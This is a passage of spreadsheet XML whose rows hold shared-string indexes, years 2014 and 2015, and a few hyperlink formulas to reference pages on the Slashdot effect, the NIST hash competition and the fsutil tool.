        <v>4220</v>
      </c>
      <c r="D9" s="190"/>
      <c r="E9" s="190"/>
      <c r="F9" s="188" t="s">
        <v>4218</v>
      </c>
      <c r="G9" s="54"/>
      <c r="H9" s="3"/>
      <c r="I9" s="3"/>
    </row>
    <row r="10">
      <c r="A10" s="188" t="s">
        <v>4215</v>
      </c>
      <c r="B10" s="189">
        <v>2014.0</v>
      </c>
      <c r="C10" s="188" t="s">
        <v>4223</v>
      </c>
      <c r="D10" s="190"/>
      <c r="E10" s="190"/>
      <c r="F10" s="188" t="s">
        <v>4218</v>
      </c>
      <c r="G10" s="3"/>
      <c r="H10" s="3"/>
      <c r="I10" s="3"/>
    </row>
    <row r="11">
      <c r="A11" s="188" t="s">
        <v>4215</v>
      </c>
      <c r="B11" s="189">
        <v>2014.0</v>
      </c>
      <c r="C11" s="188" t="s">
        <v>4224</v>
      </c>
      <c r="D11" s="190"/>
      <c r="E11" s="190"/>
      <c r="F11" s="188" t="s">
        <v>4218</v>
      </c>
      <c r="G11" s="3"/>
      <c r="H11" s="3"/>
      <c r="I11" s="3"/>
    </row>
    <row r="12">
      <c r="A12" s="188" t="s">
        <v>4215</v>
      </c>
      <c r="B12" s="189">
        <v>2014.0</v>
      </c>
      <c r="C12" s="188" t="s">
        <v>4226</v>
      </c>
      <c r="D12" s="190"/>
      <c r="E12" s="194"/>
      <c r="F12" s="188" t="s">
        <v>4218</v>
      </c>
      <c r="G12" s="54"/>
      <c r="H12" s="3"/>
      <c r="I12" s="3"/>
    </row>
    <row r="13">
      <c r="A13" s="188" t="s">
        <v>4215</v>
      </c>
      <c r="B13" s="189">
        <v>2014.0</v>
      </c>
      <c r="C13" s="188" t="s">
        <v>4227</v>
      </c>
      <c r="D13" s="190"/>
      <c r="E13" s="194"/>
      <c r="F13" s="188" t="s">
        <v>4218</v>
      </c>
      <c r="G13" s="54"/>
      <c r="H13" s="3"/>
      <c r="I13" s="3"/>
    </row>
    <row r="14">
      <c r="A14" s="188" t="s">
        <v>4215</v>
      </c>
      <c r="B14" s="189">
        <v>2014.0</v>
      </c>
      <c r="C14" s="188" t="s">
        <v>4228</v>
      </c>
      <c r="D14" s="190"/>
      <c r="E14" s="190"/>
      <c r="F14" s="188" t="s">
        <v>4218</v>
      </c>
      <c r="G14" s="54"/>
      <c r="H14" s="54"/>
      <c r="I14" s="3"/>
    </row>
    <row r="15">
      <c r="A15" s="198" t="s">
        <v>38</v>
      </c>
      <c r="B15" s="199">
        <v>2014.0</v>
      </c>
      <c r="C15" s="198" t="s">
        <v>4241</v>
      </c>
      <c r="D15" s="190"/>
      <c r="E15" s="190"/>
      <c r="F15" s="198" t="s">
        <v>4243</v>
      </c>
      <c r="G15" s="194"/>
      <c r="H15" s="54"/>
      <c r="I15" s="3"/>
    </row>
    <row r="16">
      <c r="A16" s="198" t="s">
        <v>38</v>
      </c>
      <c r="B16" s="199">
        <v>2014.0</v>
      </c>
      <c r="C16" s="198" t="s">
        <v>4244</v>
      </c>
      <c r="D16" s="190"/>
      <c r="E16" s="190"/>
      <c r="F16" s="198" t="s">
        <v>4243</v>
      </c>
      <c r="G16" s="190"/>
      <c r="H16" s="54"/>
      <c r="I16" s="3"/>
    </row>
    <row r="17">
      <c r="A17" s="17">
        <v>42507.0</v>
      </c>
      <c r="B17" s="7"/>
      <c r="C17" s="6"/>
      <c r="D17" s="6"/>
      <c r="E17" s="6"/>
      <c r="F17" s="6"/>
      <c r="G17" s="6"/>
      <c r="H17" s="6"/>
      <c r="I17" s="8"/>
      <c r="J17" s="8"/>
      <c r="K17" s="9"/>
      <c r="L17" s="9"/>
      <c r="M17" s="9"/>
      <c r="N17" s="9"/>
      <c r="O17" s="9"/>
      <c r="P17" s="9"/>
      <c r="Q17" s="9"/>
      <c r="R17" s="9"/>
      <c r="S17" s="9"/>
      <c r="T17" s="9"/>
      <c r="U17" s="9"/>
      <c r="V17" s="9"/>
      <c r="W17" s="9"/>
      <c r="X17" s="9"/>
      <c r="Y17" s="9"/>
      <c r="Z17" s="9"/>
    </row>
    <row r="18">
      <c r="A18" s="201" t="s">
        <v>4245</v>
      </c>
      <c r="B18" s="202">
        <v>2014.0</v>
      </c>
      <c r="C18" s="201" t="s">
        <v>4263</v>
      </c>
      <c r="D18" s="201" t="s">
        <v>573</v>
      </c>
      <c r="E18" s="201"/>
      <c r="F18" s="201" t="s">
        <v>4266</v>
      </c>
      <c r="G18" s="203"/>
      <c r="H18" s="2"/>
    </row>
    <row r="19">
      <c r="A19" s="204" t="s">
        <v>4270</v>
      </c>
      <c r="B19" s="204" t="s">
        <v>573</v>
      </c>
      <c r="C19" s="203"/>
      <c r="D19" s="204" t="s">
        <v>4266</v>
      </c>
      <c r="E19" s="203"/>
    </row>
    <row r="20">
      <c r="A20" s="203" t="s">
        <v>4271</v>
      </c>
      <c r="B20" s="203" t="s">
        <v>128</v>
      </c>
      <c r="C20" s="203" t="s">
        <v>573</v>
      </c>
      <c r="D20" s="203" t="s">
        <v>4266</v>
      </c>
      <c r="E20" s="203"/>
    </row>
    <row r="21">
      <c r="A21" s="203" t="s">
        <v>4272</v>
      </c>
      <c r="B21" s="203" t="s">
        <v>573</v>
      </c>
      <c r="C21" s="203"/>
      <c r="D21" s="203" t="s">
        <v>4266</v>
      </c>
      <c r="E21" s="203"/>
    </row>
    <row r="22">
      <c r="A22" s="203" t="s">
        <v>4273</v>
      </c>
      <c r="B22" s="203" t="s">
        <v>573</v>
      </c>
      <c r="C22" s="203"/>
      <c r="D22" s="203" t="s">
        <v>4266</v>
      </c>
      <c r="E22" s="203"/>
    </row>
    <row r="23">
      <c r="A23" s="203" t="s">
        <v>4274</v>
      </c>
      <c r="B23" s="203" t="s">
        <v>573</v>
      </c>
      <c r="C23" s="203"/>
      <c r="D23" s="203" t="s">
        <v>4266</v>
      </c>
      <c r="E23" s="203"/>
    </row>
    <row r="24">
      <c r="A24" s="203" t="s">
        <v>4275</v>
      </c>
      <c r="B24" s="203" t="s">
        <v>573</v>
      </c>
      <c r="C24" s="203"/>
      <c r="D24" s="203" t="s">
        <v>4266</v>
      </c>
      <c r="E24" s="203"/>
    </row>
    <row r="25">
      <c r="A25" s="203" t="s">
        <v>4276</v>
      </c>
      <c r="B25" s="203" t="s">
        <v>573</v>
      </c>
      <c r="C25" s="203"/>
      <c r="D25" s="203" t="s">
        <v>4277</v>
      </c>
      <c r="E25" s="203" t="s">
        <v>4266</v>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="203" t="s">
        <v>4278</v>
      </c>
      <c r="B26" s="203" t="s">
        <v>573</v>
      </c>
      <c r="C26" s="203"/>
      <c r="D26" s="203" t="s">
        <v>4279</v>
      </c>
      <c r="E26" s="203" t="s">
        <v>4266</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="37" t="s">
        <v>671</v>
      </c>
      <c r="B28" s="39">
        <v>2014.0</v>
      </c>
      <c r="C28" s="37" t="s">
        <v>4280</v>
      </c>
      <c r="D28" s="37" t="s">
        <v>48</v>
      </c>
      <c r="E28" s="37" t="s">
        <v>4281</v>
      </c>
      <c r="F28" s="37" t="s">
        <v>4282</v>
      </c>
      <c r="G28" s="37" t="s">
        <v>4283</v>
      </c>
      <c r="H28" s="68"/>
    </row>
    <row r="29">
      <c r="A29" s="37" t="s">
        <v>671</v>
      </c>
      <c r="B29" s="39">
        <v>2014.0</v>
      </c>
      <c r="C29" s="37" t="s">
        <v>4284</v>
      </c>
      <c r="D29" s="37" t="s">
        <v>48</v>
      </c>
      <c r="E29" s="37" t="s">
        <v>116</v>
      </c>
      <c r="F29" s="37" t="s">
        <v>4285</v>
      </c>
      <c r="G29" s="68"/>
      <c r="H29" s="68"/>
    </row>
    <row r="30">
      <c r="A30" s="37" t="s">
        <v>671</v>
      </c>
      <c r="B30" s="39">
        <v>2014.0</v>
      </c>
      <c r="C30" s="37" t="s">
        <v>4286</v>
      </c>
      <c r="D30" s="37" t="s">
        <v>48</v>
      </c>
      <c r="E30" s="37" t="s">
        <v>1222</v>
      </c>
      <c r="F30" s="37" t="s">
        <v>3077</v>
      </c>
      <c r="G30" s="37" t="s">
        <v>4287</v>
      </c>
      <c r="H30" s="68"/>
    </row>
    <row r="31">
      <c r="A31" s="23" t="s">
        <v>264</v>
      </c>
      <c r="B31" s="24">
        <v>2014.0</v>
      </c>
      <c r="C31" s="23" t="s">
        <v>4288</v>
      </c>
      <c r="D31" s="23" t="s">
        <v>23</v>
      </c>
      <c r="E31" s="28"/>
      <c r="F31" s="23" t="s">
        <v>4289</v>
      </c>
      <c r="G31" s="23" t="s">
        <v>4290</v>
      </c>
      <c r="H31" s="28"/>
    </row>
    <row r="32">
      <c r="A32" s="17">
        <v>42517.0</v>
      </c>
      <c r="B32" s="7"/>
      <c r="C32" s="6"/>
      <c r="D32" s="6"/>
      <c r="E32" s="6"/>
      <c r="F32" s="6"/>
      <c r="G32" s="6"/>
      <c r="H32" s="6"/>
      <c r="I32" s="8"/>
      <c r="J32" s="8"/>
      <c r="K32" s="9"/>
      <c r="L32" s="9"/>
      <c r="M32" s="9"/>
      <c r="N32" s="9"/>
      <c r="O32" s="9"/>
      <c r="P32" s="9"/>
      <c r="Q32" s="9"/>
      <c r="R32" s="9"/>
      <c r="S32" s="9"/>
      <c r="T32" s="9"/>
      <c r="U32" s="9"/>
      <c r="V32" s="9"/>
      <c r="W32" s="9"/>
      <c r="X32" s="9"/>
      <c r="Y32" s="9"/>
      <c r="Z32" s="9"/>
    </row>
    <row r="33">
      <c r="A33" s="5" t="s">
        <v>502</v>
      </c>
      <c r="B33" s="43">
        <v>2014.0</v>
      </c>
      <c r="C33" s="5" t="s">
        <v>4291</v>
      </c>
      <c r="D33" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E33" s="3"/>
      <c r="F33" s="5" t="s">
        <v>4292</v>
      </c>
      <c r="G33" s="5" t="s">
        <v>4293</v>
      </c>
      <c r="H33" s="3"/>
    </row>
    <row r="34">
      <c r="A34" s="5" t="s">
        <v>502</v>
      </c>
      <c r="B34" s="43">
        <v>2014.0</v>
      </c>
      <c r="C34" s="5" t="s">
        <v>4294</v>
      </c>
      <c r="D34" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E34" s="3"/>
      <c r="F34" s="5" t="s">
        <v>4292</v>
      </c>
      <c r="G34" s="5" t="s">
        <v>4295</v>
      </c>
      <c r="H34" s="3"/>
    </row>
    <row r="35">
      <c r="A35" s="5" t="s">
        <v>502</v>
      </c>
      <c r="B35" s="43">
        <v>2014.0</v>
      </c>
      <c r="C35" s="5" t="s">
        <v>4296</v>
      </c>
      <c r="D35" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E35" s="3"/>
      <c r="F35" s="5" t="s">
        <v>4297</v>
      </c>
      <c r="G35" s="5" t="s">
        <v>4298</v>
      </c>
      <c r="H35" s="3"/>
    </row>
    <row r="36">
      <c r="A36" s="5" t="s">
        <v>502</v>
      </c>
      <c r="B36" s="43">
        <v>2014.0</v>
      </c>
      <c r="C36" s="5" t="s">
        <v>4299</v>
      </c>
      <c r="D36" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E36" s="3"/>
      <c r="F36" s="5" t="s">
        <v>266</v>
      </c>
      <c r="G36" s="5" t="s">
        <v>4300</v>
      </c>
      <c r="H36" s="5" t="s">
        <v>4301</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="s">
        <v>502</v>
      </c>
      <c r="B37" s="43">
        <v>2014.0</v>
      </c>
      <c r="C37" s="5" t="s">
        <v>4302</v>
      </c>
      <c r="D37" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E37" s="3"/>
      <c r="F37" s="5" t="s">
        <v>266</v>
      </c>
      <c r="G37" s="5" t="s">
        <v>4303</v>
      </c>
      <c r="H37" s="3"/>
    </row>
    <row r="38">
      <c r="A38" s="5" t="s">
        <v>362</v>
      </c>
      <c r="B38" s="43">
        <v>2014.0</v>
      </c>
      <c r="C38" s="5" t="s">
        <v>4304</v>
      </c>
      <c r="D38" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E38" s="3"/>
      <c r="F38" s="5" t="s">
        <v>4305</v>
      </c>
      <c r="G38" s="5" t="s">
        <v>4306</v>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="s">
        <v>424</v>
      </c>
      <c r="B39" s="43">
        <v>2014.0</v>
      </c>
      <c r="C39" s="5" t="s">
        <v>4307</v>
      </c>
      <c r="D39" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E39" s="5" t="s">
        <v>4308</v>
      </c>
      <c r="F39" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G39" s="3"/>
    </row>
    <row r="40">
      <c r="A40" s="5" t="s">
        <v>424</v>
      </c>
      <c r="B40" s="43">
        <v>2014.0</v>
      </c>
      <c r="C40" s="5" t="s">
        <v>4309</v>
      </c>
      <c r="D40" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E40" s="5" t="s">
        <v>4310</v>
      </c>
      <c r="F40" s="56" t="s">
        <v>4311</v>
      </c>
      <c r="G40" s="3"/>
    </row>
    <row r="41">
      <c r="A41" s="5" t="s">
        <v>434</v>
      </c>
      <c r="B41" s="43">
        <v>2014.0</v>
      </c>
      <c r="C41" s="5" t="s">
        <v>4312</v>
      </c>
      <c r="D41" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E41" s="5" t="s">
        <v>4313</v>
      </c>
      <c r="F41" s="5" t="s">
        <v>4314</v>
      </c>
      <c r="G41" s="3"/>
    </row>
    <row r="42">
      <c r="A42" s="5" t="s">
        <v>434</v>
      </c>
      <c r="B42" s="43">
        <v>2014.0</v>
      </c>
      <c r="C42" s="5" t="s">
        <v>4315</v>
      </c>
      <c r="D42" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E42" s="5" t="s">
        <v>4316</v>
      </c>
      <c r="F42" s="5" t="s">
        <v>4317</v>
      </c>
      <c r="G42" s="3"/>
      <c r="H42" s="5" t="s">
        <v>4318</v>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="s">
        <v>434</v>
      </c>
      <c r="B43" s="43">
        <v>2014.0</v>
      </c>
      <c r="C43" s="5" t="s">
        <v>4319</v>
      </c>
      <c r="D43" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E43" s="5" t="s">
        <v>4320</v>
      </c>
      <c r="F43" s="5" t="s">
        <v>4321</v>
      </c>
      <c r="G43" s="3"/>
    </row>
    <row r="44">
      <c r="A44" s="205">
        <v>9447.0</v>
      </c>
      <c r="B44" s="205">
        <v>2014.0</v>
      </c>
      <c r="C44" s="203" t="s">
        <v>4322</v>
      </c>
      <c r="D44" s="203"/>
      <c r="E44" s="203"/>
      <c r="F44" s="203" t="s">
        <v>4323</v>
      </c>
      <c r="G44" s="203"/>
    </row>
    <row r="45">
      <c r="A45" s="205">
        <v>9447.0</v>
      </c>
      <c r="B45" s="205">
        <v>2014.0</v>
      </c>
      <c r="C45" s="203" t="s">
        <v>4324</v>
      </c>
      <c r="D45" s="203" t="s">
        <v>128</v>
      </c>
      <c r="E45" s="203" t="s">
        <v>573</v>
      </c>
      <c r="F45" s="203" t="s">
        <v>4325</v>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="203" t="s">
        <v>464</v>
      </c>
      <c r="B46" s="205">
        <v>2014.0</v>
      </c>
      <c r="C46" s="203" t="s">
        <v>4326</v>
      </c>
      <c r="D46" s="203" t="s">
        <v>573</v>
      </c>
      <c r="E46" s="203"/>
      <c r="F46" s="203" t="s">
        <v>4266</v>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="203" t="s">
        <v>464</v>
      </c>
      <c r="B47" s="205">
        <v>2014.0</v>
      </c>
      <c r="C47" s="203" t="s">
        <v>4327</v>
      </c>
      <c r="D47" s="203" t="s">
        <v>573</v>
      </c>
      <c r="E47" s="203"/>
      <c r="F47" s="203" t="s">
        <v>4266</v>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="203" t="s">
        <v>464</v>
      </c>
      <c r="B48" s="205">
        <v>2014.0</v>
      </c>
      <c r="C48" s="203" t="s">
        <v>4328</v>
      </c>
      <c r="D48" s="203" t="s">
        <v>573</v>
      </c>
      <c r="E48" s="203"/>
      <c r="F48" s="203" t="s">
        <v>4329</v>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="203" t="s">
        <v>464</v>
      </c>
      <c r="B49" s="205">
        <v>2014.0</v>
      </c>
      <c r="C49" s="203" t="s">
        <v>4330</v>
      </c>
      <c r="D49" s="203" t="s">
        <v>573</v>
      </c>
      <c r="E49" s="203"/>
      <c r="F49" s="203" t="s">
        <v>4266</v>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="203" t="s">
        <v>464</v>
      </c>
      <c r="B50" s="205">
        <v>2014.0</v>
      </c>
      <c r="C50" s="203" t="s">
        <v>4331</v>
      </c>
      <c r="D50" s="203" t="s">
        <v>4332</v>
      </c>
      <c r="E50" s="203"/>
      <c r="F50" s="203" t="s">
        <v>4323</v>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="203" t="s">
        <v>472</v>
      </c>
      <c r="B51" s="205">
        <v>2014.0</v>
      </c>
      <c r="C51" s="203" t="s">
        <v>4333</v>
      </c>
      <c r="D51" s="203" t="s">
        <v>573</v>
      </c>
      <c r="E51" s="203"/>
      <c r="F51" s="203" t="s">
        <v>4266</v>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="203" t="s">
        <v>472</v>
      </c>
      <c r="B52" s="205">
        <v>2014.0</v>
      </c>
      <c r="C52" s="203" t="s">
        <v>4334</v>
      </c>
      <c r="D52" s="203" t="s">
        <v>573</v>
      </c>
      <c r="E52" s="203"/>
      <c r="F52" s="203" t="s">
        <v>4335</v>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="203" t="s">
        <v>472</v>
      </c>
      <c r="B53" s="205">
        <v>2014.0</v>
      </c>
      <c r="C53" s="203" t="s">
        <v>4336</v>
      </c>
      <c r="D53" s="203" t="s">
        <v>573</v>
      </c>
      <c r="E53" s="203"/>
      <c r="F53" s="203" t="s">
        <v>4335</v>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="203" t="s">
        <v>472</v>
      </c>
      <c r="B54" s="205">
        <v>2014.0</v>
      </c>
      <c r="C54" s="203" t="s">
        <v>4337</v>
      </c>
      <c r="D54" s="203" t="s">
        <v>573</v>
      </c>
      <c r="E54" s="203"/>
      <c r="F54" s="203" t="s">
        <v>4338</v>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="17">
        <v>42521.0</v>
      </c>
      <c r="B55" s="7"/>
      <c r="C55" s="6"/>
      <c r="D55" s="6"/>
      <c r="E55" s="6"/>
      <c r="F55" s="6"/>
      <c r="G55" s="6"/>
      <c r="H55" s="6"/>
      <c r="I55" s="8"/>
      <c r="J55" s="8"/>
      <c r="K55" s="9"/>
      <c r="L55" s="9"/>
      <c r="M55" s="9"/>
      <c r="N55" s="9"/>
      <c r="O55" s="9"/>
      <c r="P55" s="9"/>
      <c r="Q55" s="9"/>
      <c r="R55" s="9"/>
      <c r="S55" s="9"/>
      <c r="T55" s="9"/>
      <c r="U55" s="9"/>
      <c r="V55" s="9"/>
      <c r="W55" s="9"/>
      <c r="X55" s="9"/>
      <c r="Y55" s="9"/>
      <c r="Z55" s="9"/>
    </row>
    <row r="56">
      <c r="A56" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B56" s="43">
        <v>2014.0</v>
      </c>
      <c r="C56" s="5" t="s">
        <v>4339</v>
      </c>
      <c r="D56" s="5" t="s">
        <v>245</v>
      </c>
      <c r="E56" s="5" t="s">
        <v>4340</v>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B57" s="43">
        <v>2014.0</v>
      </c>
      <c r="C57" s="5" t="s">
        <v>4341</v>
      </c>
      <c r="D57" s="5" t="s">
        <v>249</v>
      </c>
      <c r="E57" s="5" t="s">
        <v>4342</v>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B58" s="43">
        <v>2014.0</v>
      </c>
      <c r="C58" s="5" t="s">
        <v>4343</v>
      </c>
      <c r="D58" s="5" t="s">
        <v>4344</v>
      </c>
      <c r="E58" s="5"/>
    </row>
    <row r="59">
      <c r="A59" s="30" t="s">
        <v>1168</v>
      </c>
      <c r="B59" s="31">
        <v>2014.0</v>
      </c>
      <c r="C59" s="30" t="s">
        <v>4345</v>
      </c>
      <c r="D59" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E59" s="30" t="s">
        <v>4346</v>
      </c>
      <c r="F59" s="30" t="s">
        <v>4347</v>
      </c>
      <c r="G59" s="33" t="s">
        <v>4348</v>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="30" t="s">
        <v>1168</v>
      </c>
      <c r="B60" s="31">
        <v>2014.0</v>
      </c>
      <c r="C60" s="30" t="s">
        <v>4349</v>
      </c>
      <c r="D60" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E60" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F60" s="30" t="s">
        <v>4350</v>
      </c>
      <c r="G60" s="30" t="str">
        <f>HYPERLINK(" https://en.wikipedia.org/wiki/Slashdot_effect","Slashdot effect")</f>
        <v>Slashdot effect</v>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="30" t="s">
        <v>1168</v>
      </c>
      <c r="B61" s="31">
        <v>2014.0</v>
      </c>
      <c r="C61" s="30" t="s">
        <v>4351</v>
      </c>
      <c r="D61" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E61" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F61" s="30" t="s">
        <v>4352</v>
      </c>
      <c r="G61" s="30"/>
    </row>
    <row r="62">
      <c r="A62" s="30" t="s">
        <v>1168</v>
      </c>
      <c r="B62" s="31">
        <v>2014.0</v>
      </c>
      <c r="C62" s="30" t="s">
        <v>4353</v>
      </c>
      <c r="D62" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E62" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F62" s="30" t="s">
        <v>4354</v>
      </c>
      <c r="G62" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/NIST_hash_function_competition","NIST Hash Function Competition ")</f>
        <v>NIST Hash Function Competition </v>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B63" s="31">
        <v>2014.0</v>
      </c>
      <c r="C63" s="30" t="s">
        <v>4355</v>
      </c>
      <c r="D63" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E63" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F63" s="30" t="s">
        <v>4356</v>
      </c>
      <c r="G63" s="33" t="str">
        <f>HYPERLINK("https://technet.microsoft.com/en-us/library/ff621566.aspx","Microsoft MSDN fsutil")</f>
        <v>Microsoft MSDN fsutil</v>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="40" t="s">
        <v>553</v>
      </c>
      <c r="B64" s="40">
        <v>2014.0</v>
      </c>
      <c r="C64" s="40" t="s">
        <v>4357</v>
      </c>
      <c r="D64" s="40" t="s">
        <v>23</v>
      </c>
      <c r="E64" s="40" t="s">
        <v>4358</v>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="17">
        <v>42528.0</v>
      </c>
      <c r="B65" s="7"/>
      <c r="C65" s="6"/>
      <c r="D65" s="6"/>
      <c r="E65" s="6"/>
      <c r="F65" s="6"/>
      <c r="G65" s="6"/>
      <c r="H65" s="6"/>
      <c r="I65" s="8"/>
      <c r="J65" s="8"/>
      <c r="K65" s="9"/>
      <c r="L65" s="9"/>
      <c r="M65" s="9"/>
      <c r="N65" s="9"/>
      <c r="O65" s="9"/>
      <c r="P65" s="9"/>
      <c r="Q65" s="9"/>
      <c r="R65" s="9"/>
      <c r="S65" s="9"/>
      <c r="T65" s="9"/>
      <c r="U65" s="9"/>
      <c r="V65" s="9"/>
      <c r="W65" s="9"/>
      <c r="X65" s="9"/>
      <c r="Y65" s="9"/>
      <c r="Z65" s="9"/>
    </row>
    <row r="66">
      <c r="A66" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B66" s="40">
        <v>2014.0</v>
      </c>
      <c r="C66" s="40" t="s">
        <v>4359</v>
      </c>
      <c r="D66" s="40" t="s">
        <v>4360</v>
      </c>
      <c r="E66" s="40" t="s">
        <v>4361</v>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B67" s="40">
        <v>2014.0</v>
      </c>
      <c r="C67" s="40" t="s">
        <v>4362</v>
      </c>
      <c r="D67" s="40" t="s">
        <v>4363</v>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B68" s="40">
        <v>2014.0</v>
      </c>
      <c r="C68" s="40" t="s">
        <v>4364</v>
      </c>
      <c r="D68" s="40" t="s">
        <v>48</v>
      </c>
      <c r="F68" s="40" t="s">
        <v>4365</v>
      </c>
      <c r="G68" s="40" t="s">
        <v>4366</v>
      </c>
      <c r="H68" s="92" t="s">
        <v>4367</v>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="17">
        <v>42534.0</v>
      </c>
      <c r="B69" s="7"/>
      <c r="C69" s="6"/>
      <c r="D69" s="6"/>
      <c r="E69" s="6"/>
      <c r="F69" s="6"/>
      <c r="G69" s="6"/>
      <c r="H69" s="6"/>
      <c r="I69" s="8"/>
      <c r="J69" s="8"/>
      <c r="K69" s="9"/>
      <c r="L69" s="9"/>
      <c r="M69" s="9"/>
      <c r="N69" s="9"/>
      <c r="O69" s="9"/>
      <c r="P69" s="9"/>
      <c r="Q69" s="9"/>
      <c r="R69" s="9"/>
      <c r="S69" s="9"/>
      <c r="T69" s="9"/>
      <c r="U69" s="9"/>
      <c r="V69" s="9"/>
      <c r="W69" s="9"/>
      <c r="X69" s="9"/>
      <c r="Y69" s="9"/>
      <c r="Z69" s="9"/>
    </row>
    <row r="70">
      <c r="A70" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B70" s="31">
        <v>2014.0</v>
      </c>
      <c r="C70" s="30" t="s">
        <v>4368</v>
      </c>
      <c r="D70" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E70" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F70" s="30" t="s">
        <v>4369</v>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="17">
        <v>42538.0</v>
      </c>
      <c r="B71" s="7"/>
      <c r="C71" s="6"/>
      <c r="D71" s="6"/>
      <c r="E71" s="6"/>
      <c r="F71" s="6"/>
      <c r="G71" s="6"/>
      <c r="H71" s="6"/>
      <c r="I71" s="8"/>
      <c r="J71" s="8"/>
      <c r="K71" s="9"/>
      <c r="L71" s="9"/>
      <c r="M71" s="9"/>
      <c r="N71" s="9"/>
      <c r="O71" s="9"/>
      <c r="P71" s="9"/>
      <c r="Q71" s="9"/>
      <c r="R71" s="9"/>
      <c r="S71" s="9"/>
      <c r="T71" s="9"/>
      <c r="U71" s="9"/>
      <c r="V71" s="9"/>
      <c r="W71" s="9"/>
      <c r="X71" s="9"/>
      <c r="Y71" s="9"/>
      <c r="Z71" s="9"/>
    </row>
    <row r="72">
      <c r="A72" s="206">
        <v>42542.0</v>
      </c>
      <c r="B72" s="207"/>
      <c r="C72" s="207"/>
      <c r="D72" s="207"/>
      <c r="E72" s="207"/>
      <c r="F72" s="207"/>
      <c r="G72" s="207"/>
      <c r="H72" s="207"/>
      <c r="I72" s="207"/>
      <c r="J72" s="207"/>
      <c r="K72" s="207"/>
      <c r="L72" s="207"/>
      <c r="M72" s="207"/>
      <c r="N72" s="207"/>
      <c r="O72" s="207"/>
      <c r="P72" s="207"/>
      <c r="Q72" s="207"/>
      <c r="R72" s="207"/>
      <c r="S72" s="207"/>
      <c r="T72" s="207"/>
      <c r="U72" s="207"/>
      <c r="V72" s="207"/>
      <c r="W72" s="207"/>
      <c r="X72" s="207"/>
      <c r="Y72" s="207"/>
      <c r="Z72" s="207"/>
    </row>
    <row r="73">
      <c r="A73" s="37">
        <v>9447.0</v>
      </c>
      <c r="B73" s="40">
        <v>2015.0</v>
      </c>
      <c r="C73" s="40" t="s">
        <v>4370</v>
      </c>
      <c r="D73" s="40" t="s">
        <v>23</v>
      </c>
      <c r="F73" s="40" t="s">
        <v>4371</v>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="37">
        <v>9447.0</v>
      </c>
      <c r="B74" s="40">
        <v>2015.0</v>
      </c>
      <c r="C74" s="40" t="s">
        <v>4372</v>
      </c>
      <c r="D74" s="40" t="s">
        <v>23</v>
      </c>
      <c r="F74" s="40" t="s">
        <v>4373</v>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="30" t="s">
        <v>857</v>
      </c>
      <c r="B75" s="31">
        <v>2015.0</v>
      </c>
      <c r="C75" s="30" t="s">
        <v>4374</v>
      </c>
      <c r="D75" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E75" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F75" s="30" t="s">
        <v>4375</v>
      </c>
      <c r="G75" s="208"/>
      <c r="H75" s="30"/>
      <c r="I75" s="30"/>
    </row>
    <row r="76">
      <c r="A76" s="30" t="s">
        <v>857</v>
      </c>
      <c r="B76" s="31">
        <v>2015.0</v>
      </c>
      <c r="C76" s="30" t="s">
        <v>4376</v>
      </c>
      <c r="D76" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E76" s="30" t="s">
        <v>4377</v>
      </c>
      <c r="F76" s="30" t="s">
        <v>4378</v>
      </c>
      <c r="G76" s="208"/>
      <c r="H76" s="30"/>
      <c r="I76" s="30"/>
    </row>
